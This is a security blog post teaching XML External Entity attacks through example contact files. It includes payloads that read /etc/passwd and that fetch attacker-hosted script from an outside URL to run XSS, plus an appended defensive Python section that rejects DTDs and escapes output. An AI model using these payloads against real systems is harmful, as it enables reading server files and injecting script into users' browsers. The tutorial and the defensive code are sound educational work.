XML External Entity attack (XXE) in a Nutshell

The XXE attack has been around for years, but it did not get much attention until the last couple of years, when high-profile cases at Facebook and PayPal brought it into the spotlight.

So, what is the XML External Entity attack? XXE is short for XML External Entity. Entities are part of the XML spec, and an external entity is one whose content resolves to someplace outside the document itself rather than to text defined within the same document.

A few basic examples describe the concept best. Let's say we have a web app that takes an XML file as input and displays it in a table.

Example 1

Here's a sample input file:

<?xml version="1.0" encoding="utf-8"?>
<contacts>
  <contact>
    <login>bobw</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

This is processed and displays the following:

login   name         email
bobw    Bob Walker   bob@bob.com
ajones  Alice Jones  alice@alice.com

Pretty straightforward, right?


Example 2

Now, let's take the same example and add an entity:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo "Foo">
]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

This processes and displays:

login   name         email
Foo     Bob Walker   bob@bob.com
ajones  Alice Jones  alice@alice.com

What happened? On line 3 of the XML file we declared an entity called foo whose value is the string "Foo". On line 7 we then use that entity, &foo;, in place of Bob's login. While processing the document, the parser substituted "Foo" wherever it saw &foo;.


Example 3

Now let's do something really interesting. Consider the following:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo SYSTEM "file:///etc/passwd">
]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

This processes and displays:

login                                       name         email
root:x:0:0:root:/root:/bin/bash <redacted>  Bob Walker   bob@bob.com
ajones                                      Alice Jones  alice@alice.com

What did it do? On line 3, the keyword SYSTEM means that the content of this entity is external to the document. In this case, the external entity refers to /etc/passwd on the system that is processing the XML. The parser pulls the contents of /etc/passwd into the document, and the app then displays them.


Example 4

Up to this point, the attacks have been against the server. How can we attack the user? Consider this:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo SYSTEM "http://www.bitbucket.me/log/xss.php">
]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

What do you think the external entity reference does here? The URL returns <script>alert('xss')</script>. When the table is displayed, that script executes in the browser. (I'm not showing the results as in the previous examples, because the script would execute while you are reading this; it's just an example showing that the app is vulnerable.)
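As an added example that is not part of the original post, here is a small Python version of the contacts app described above, written from the defender's side. It uses the four documents from the post as constructed inputs (the Example 1 file, plus the same file with each of the three entity declarations). Before parsing it refuses any document that carries a DOCTYPE, which is where every entity in these examples is declared, and when it renders the table it HTML-escapes each cell so that entity-sourced markup like the Example 4 payload would be shown as text rather than run. The stdlib modules are real; the function and class names (reject_dtd, load_contacts, render_table, DtdNotAllowed) are my own and not from the post.

```python
import html
import xml.etree.ElementTree as ET
import xml.parsers.expat

# Constructed input: the Example 1 document from the post, compacted.
EXAMPLE_1 = """<?xml version="1.0" encoding="utf-8"?>
<contacts>
  <contact><login>bobw</login><name>Bob Walker</name><email>bob@bob.com</email></contact>
  <contact><login>ajones</login><name>Alice Jones</name><email>alice@alice.com</email></contact>
</contacts>"""


def _with_entity(decl: str) -> str:
    """Build Examples 2-4: add a DOCTYPE declaring foo and use &foo; as Bob's login."""
    doc = EXAMPLE_1.replace(
        '?>\n<contacts>', '?>\n<!DOCTYPE root [\n<!ENTITY foo %s>\n]>\n<contacts>' % decl, 1)
    return doc.replace("<login>bobw</login>", "<login>&foo;</login>", 1)


EXAMPLE_2 = _with_entity('"Foo"')                                        # internal entity
EXAMPLE_3 = _with_entity('SYSTEM "file:///etc/passwd"')                  # local file
EXAMPLE_4 = _with_entity('SYSTEM "http://www.bitbucket.me/log/xss.php"')  # remote URL


class DtdNotAllowed(ValueError):
    """Raised when an input document carries a DOCTYPE, which this app never needs."""


def reject_dtd(xml_text: str) -> None:
    """Abort at the first DOCTYPE declaration, before any entity can be declared or used.

    Refusing the DTD up front covers internal, file:// and http:// entities alike,
    so the parser never gets a chance to resolve anything outside the document.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} is not accepted by this application")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)  # exceptions raised in a handler propagate out of Parse()


def load_contacts(xml_text: str) -> list[dict]:
    """Run the DTD check, then parse; returns one dict per <contact> element."""
    reject_dtd(xml_text)
    root = ET.fromstring(xml_text)
    return [
        {field: (c.findtext(field) or "") for field in ("login", "name", "email")}
        for c in root.findall("contact")
    ]


def is_rejected(xml_text: str) -> bool:
    """True if load_contacts refuses the document because of its DOCTYPE."""
    try:
        load_contacts(xml_text)
    except DtdNotAllowed:
        return True
    return False


def render_table(rows: list[dict]) -> str:
    """Build the HTML table, escaping every cell so markup in a value is displayed, not executed."""
    fields = ("login", "name", "email")
    header = "<tr>" + "".join(f"<th>{f}</th>" for f in fields) + "</tr>"
    body = "".join(
        "<tr>" + "".join(f"<td>{html.escape(r[f])}</td>" for f in fields) + "</tr>"
        for r in rows
    )
    return f"<table>{header}{body}</table>"


def internal_entity_expands() -> str:
    """Example 2 parsed without the guard: the stdlib parser substitutes 'Foo' for &foo;."""
    return ET.fromstring(EXAMPLE_2).findtext("contact/login")


if __name__ == "__main__":
    print(render_table(load_contacts(EXAMPLE_1)))
    for doc in (EXAMPLE_2, EXAMPLE_3, EXAMPLE_4):
        print("rejected:", is_rejected(doc))
    print("Example 2 login without the guard:", internal_entity_expands())
```

Two layers are deliberate: the DOCTYPE check stops the parser from ever seeing an entity declaration (the fix that addresses Examples 2 through 4 at the source), and the output escaping means that even a value which did arrive containing a script tag is rendered as text in the table.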

I hope these examples give you a basic understanding of what the XXE vulnerability is. I'll likely do a follow-up post soon with more advanced examples and how to mitigate it.

This entry was posted in Security.